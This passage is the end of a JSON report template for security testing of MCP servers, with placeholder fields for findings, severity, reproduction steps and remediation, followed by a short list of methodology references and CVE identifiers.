    "transport_type": "HTTP+SSE | stdio",
    "tools_tested": ["tool1", "tool2"],
    "test_environment": "Docker-based isolated lab",
    "exclusions": ["Any areas not tested"]
  },
  "findings": [
    {
      "id": "MCP-FINDING-001",
      "title": "Finding title",
      "severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
      "cvss_score": 9.6,
      "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "category": "authentication|injection|traversal|session|resource",
      "status": "OPEN|REMEDIATED|ACCEPTED",
      "description": "Detailed description of the vulnerability",
      "impact": "What an attacker could achieve",
      "steps_to_reproduce": [
        "Step 1",
        "Step 2"
      ],
      "evidence": "Screenshot, log output, or response data",
      "remediation": {
        "short_term": "Immediate mitigation",
        "long_term": "Architectural fix"
      },
      "references": ["CVE-XXXX-XXXXX", "OWASP reference"]
    }
  ],
  "recommendations": {
    "immediate": ["Actions for this week"],
    "short_term": ["Actions for next 30 days"],
    "long_term": ["Architectural improvements"]
  }
}

References
- VulnerableMCP Project Methodology: Systematic approach to MCP vulnerability discovery
- OWASP ASI: Agentic Security Initiative -- security testing guidelines for AI agent infrastructure
- OWASP Testing Guide: Web Application Security Testing
- PTES: Penetration Testing Execution Standard -- adapted for MCP
- MCP Security Guide: Comprehensive MCP threat model
- CVE-2025-6514, CVE-2025-68145, CVE-2026-25536: Reference vulnerabilities used in test cases